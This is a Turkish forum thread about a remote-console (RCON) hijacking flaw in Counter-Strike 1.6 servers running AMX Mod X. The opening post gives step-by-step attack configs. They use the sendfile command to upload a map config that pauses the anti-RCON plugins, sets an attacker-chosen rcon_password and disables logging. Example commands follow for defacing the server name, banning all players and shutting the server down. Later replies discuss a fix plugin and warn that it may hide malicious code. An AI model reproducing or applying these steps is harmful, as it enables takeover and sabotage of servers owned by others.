Login

xRteam45 · (This post was last modified: 15-07-13, 13:39 by xRteam45.)

Rcon hacklenmesinde ufak bir açık bulunmuştur.

Peki bu açıktan nasıl faydalanabiliyoruz?

Video:
[video=youtube;tgFeMjWAmFo]https://www.youtube.com/watch?v=tgFeMjWAmFo[/video]

"cstrike" send.cfg adlı bir dosya oluşturulur.

İçindeki dosyayı not defteri ile açıp şu kodlar yazılır.

wait; wait; wait
sendfile amxmodx/configs/maps/mapismi.cfg (Yani serverda hangi map açıksa o mapın ismini yazarlar.)

daha sonra,

addons/amxmodx/configs/maps uzantılı bir dosya oluşturulur.

addons/amxmodx/configs/maps uzantısının içinde serverda açık olan mapınismi.cfg (de_dust2.cfg gibi.) bir config dosyası oluşturulur

ve içine şu kodlar yazılır.

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause function
rcon_password şifreniz (serveri hacklemek için kullanıcağınız rcon_password'dur. yani örnek olarak ben "hackleme" yapıcam. sizde konsola rcon_password hackleme yazıcaksınız.)
log off
mp_logfile 0

yazıldıktan sonra dosya kaydedilir.

daha sonra herhangi bir servera girildiğinde exec send.cfg yazılır.
bir zaman sonra rcon_password şifrenizi yazdığınızda, serveri hacklemeye başlıyorsunuz Smile

örneğin kodları vereyim.

rcon hostname "Hacked By xR."
rcon amx_banmenu yazdıktan sonra herkesi banlamak Smile

rcon mp_freezetime 99999
rcon exit (bunu yazdığınızda server kapanır Smile

)

gibi..

Ve bunun çözümü bir eklenti ile ortaya çıkmıştır.

KURULUM:
İçinde bulunan RconHack_Fix_SendFile.amxx adlı dosyayı addons/amxmodx/plugins dosyasının içine
RconHack_Fix_SendFile.amxx yazısını addons/amxmodx/configs/plugins.ini açarak en alt satıra ekleyin.
Serverda map değişin veya Servera res atın.

NOT: AMX MOD X ve METAMOD kurulu olan serverlarda geçerlidir.

Bu arada konuyu düzenlerseniz memmun olurum. Konu açma kuralları eklememişsiniz Smile

DeaTReX · 15-07-13, 16:10

Fixide Var Yani Smile

xRteam45 · 15-07-13, 16:15

elbettte.
yaptığı işlem şudur;
eklentinin içinde rconu sürekli güncellemesidir. yani ne kadar değişsenizde default rcon yapıcak

***Schwertle*** · 15-07-13, 16:19

Bu açıktan haberim var. yanlız fixi konusunda endişelerim var. Bu paylaşılan fix daha henüz yabancı sitelerde yok. veya ben bulamadım. Ayrıca bu eklentinin yapımcısı konuda belirtilmemiş. [MENTION=6745]xRteam45[/MENTION] eğer bu eklenti sendfile komutunu kitleyerek yapıldıysa kesin çözüm değildir. Farklı yollardan yapıldıysa fikrim yok. Veya başka bir senaryo düşünürsek eklentinin içinde illegal yollara götürcek kodlar olabilir. bu eklentiyi kurmadan önce 2 kere düşünmenizi tavsiye ederim. Eklentinin kaynak kodu yayımlanıncaya kadar eklentiyi ben onaylamıyorum. Aynı csf gibi içerisinde açıklar bırakılarak piyasaya sürülmüş olabilir. Wink

DeaTReX · 15-07-13, 16:19

Evet Nerdeyse Tüm Sunucularda Fixlendi Smile

***Schwertle*** · 15-07-13, 16:22

xRteam45 dateline='' Wrote: elbettte.
yaptığı işlem şudur;
eklentinin içinde rconu sürekli güncellemesidir. yani ne kadar değişsenizde default rcon yapıcak

rconu sabit bir şifre mi yapıyor yoksa rconu boş mu yapıyor ?

DeaTReX · 15-07-13, 16:24

Sabit Yapıyor Galiba.

***Schwertle*** · 15-07-13, 16:28

Keşke eklentinin kaynağıda paylaşılsaydı . Geçenlerde rastladığım plugin galiba. Orphenun fonksiyonları ile kodlanmıştı. Rcon şifresini ne yaparsanız yapın şifreyi boş yapıyor. Md5 ile şifrelenmiş şifre üzerinden çekiyor . Aynı sistemi ben kullandım ve yine hacklenebiliyor Wink

Bu işin çözümü rcon kullanmamak sanırım. Yada 1 çözüm daha var ama anlatmak için boş vaktim yok Wink

DeaTReX · 15-07-13, 16:31

Ne Zmn Oldu Big Grin

xRteam45 · 15-07-13, 17:01

kurban yapmaya çalışan kişi rcon_password değiştirmeyi kalktığı zaman konsolda böyle bir hataya rastlar Smile

] rcon hostname
Bad rcon_password.
No password set for this server.

- - - - - - - - - -

kaynak: https://forums.alliedmods.net/showthread.php?p=1981283

Login
Kullanıcı Adı:
Parola	Lost Password?
	Beni Hatırla